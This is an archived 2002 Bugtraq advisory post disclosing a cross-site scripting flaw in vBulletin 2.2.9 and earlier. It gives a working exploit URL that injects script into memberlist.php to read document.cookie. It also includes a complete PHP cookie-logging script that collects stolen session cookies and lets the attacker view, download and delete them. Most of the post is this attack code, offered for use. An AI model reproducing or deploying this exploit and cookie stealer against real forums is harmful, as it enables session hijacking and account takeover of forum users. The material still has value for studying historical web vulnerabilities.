XSS bug in vBulletin

From: Arab VieruZ (arabviersus@hotmail.com)
Date: 11/21/02

  • Next message: security@caldera.com: "Security Update: [CSSA-2002-052.0] Linux: sendmail smrsh bypass vulnerabilities" 
    Date: 21 Nov 2002 20:34:03 -0000
From: Arab VieruZ <arabviersus@hotmail.com>
To: bugtraq@securityfocus.com
    ('binary' encoding is not supported, stored as-is)

    Vulnerable systems:
     * Jelsoft vBulletin 2.2.9 and prior

    Exploit:

    http://www.vbulletin.com/forum/memberlist.php?
    s=23c37cf1af5d2ad05f49361b0407ad9e&what=">"<Scr*ipt>javascript:alert
    (document.cookie)</Scr*ipt>

    you can use this code (thanx for SP.IC):

    <?PHP
          // vBulletin XSS Injection Vulnerability: Exploit
          // ---
          // Coded By : Sp.IC (SpeedICNet@Hotmail.Com).
          // Descrption: Fetching vBulletin's cookies and storing it into a
    log file.

          // Variables:

          $LogFile = "Cookies.Log";

          // Functions:
          /*
          If ($HTTP_GET_VARS['Action'] = "Log") {
              $Header = "<!--";
              $Footer = "--->";
          }
          Else {

               $Header = "";
               $Footer = "";
          }
          Print ($Header);
          */
          Print ("<Title>vBulletin XSS Injection Vulnerability:
    Exploit</Title>");
          Print ("<Pre>");
          Print ("<Center>");
          Print ("<B>vBulletin XSS Injection Vulnerability: Exploit</B>\n");
          Print ("Coded By: <B><A
    Href=\"MailTo:SpeedICNet@Hotmail.Com\">Sp.IC</A></B><Hr Width=\"20%\">");
          /*
          Print ($Footer);
          */

          Switch ($HTTP_GET_VARS['Action']) {
              Case "Log":

                     $Data = $HTTP_GET_VARS['Cookie'];
                     $Data = StrStr ($Data, SubStr ($Data, BCAdd (0x0D, StrLen
    (DecHex (MD5 (NULL))))));
                     $Log = FOpen ($LogFile, "a+");
                             FWrite ($Log, Trim ($Data) . "\n");
                             FClose ($Log);
                             Print ("<Meta HTTP-Equiv=\"Refresh\" Content=\"0;
    URL=" . $HTTP_SERVER_VARS['HTTP_REFERER'] . "\">");
              Break;
                    Case "List":
                     If (!File_Exists ($LogFile) || !In_Array ($Records)) {
                         Print ("<Br><Br><B>There are No
    Records</B></Center></Pre>");
                         Exit ();
                     }
                     Else {
                         Print ("</Center></Pre>");
                         $Records = Array_UniQue (File ($LogFile));
                                      Print ("<Pre>");
                                      Print ("<B>.:: Statics</B>\n");
                         Print ("\n");
                                      Print ("o Logged Records : <B>" . Count
    (File ($LogFile)) . "</B>\n");
                         Print ("o Listed Records : <B>" . Count
    ($Records) . " </B>[Not Counting Duplicates]\n");
                         Print ("\n");
                 
                         Print ("<B>.:: Options</B>\n");
                         Print ("\n");
                 
                         If (Count (File ($LogFile)) > 0) {
                             $Link['Download'] = "[<A Href=\"" .
    $LogFile . "\">Download</A>]";
                         }
                         Else{
                             $Link['Download'] = "[No Records in Log]";
                         }

                         Print ("o Download Log : " . $Link
    ['Download'] . "\n");
                         Print ("o Clear Records : [<A Href=\"" .
    $SCRIPT_PATH. "?Action=Delete\">Y</A>]\n");
                         Print ("\n");
                         Print ("<B>.:: Records</B>\n");
                         Print ("\n");

                         While (List ($Line[0], $Line[1]) = Each ($Records)) {
                             Print ("<B>" . $Line[0] . ": </B>" . $Line[1]);
                         }
                     }

                     Print ("</Pre>");
              Break;
              Case "Delete":
                  @UnLink ($LogFile);
                  Print ("<Br><Br><B>Deleted Succsesfuly</B></Center></Pre>")
    Or Die ("<Br><Br><B>Error: Cannot Delete Log</B></Center></Pre>");
                  Print ("<Meta HTTP-Equiv=\"Refresh\" Content=\"3; URL=" .
    $HTTP_SERVER_VARS['HTTP_REFERER'] . "\">");
              Break;
          }
        ?>

    -----------------
    Arab VieruZ
    thanX

    Relevant Pages

    • using php local file include vulnerabilities for command execution
      ... statement the are -- if they contain a valid php statement. ... and in a second step simply use the already existent local file vuln ... to read and the server's log file and this way execute the code. ... the web server has to log referer strings and the log files must ...
      (Bugtraq)
    • Re: [Repost] php log to own syslog file
      ... >> Im trying to figure out how to setup FreeBSD 5.3 to log ... >> php events to its own log file via syslog. ... the php function syslog(). ...
      (freebsd-questions)
    • Re: [SECURITYREASON.COM] phpMyAdmin Local file inclusion 2.6.4-pl1
      ... > phpMyAdmin is very dangerous script. ... unprivileged script execution of remote php code, ... to read and the server's log file and this way execute the code. ... the web server has to log user agent strings and the log files ...
      (Bugtraq)
    • Re: exec php
      ... The php script looks like ... The log file, when everything works, contains this: ... And, the funny thing, it looks exactly the same, even after the exec ...
      (comp.lang.php)
    • Re: install / uninstall log file
      ... elietabet wrote: ... prior to "The Incident", enabling it now will not help you. ... does the system keeps like a log file in which it ... >>> my personal laptop. ...
      (microsoft.public.windowsxp.general)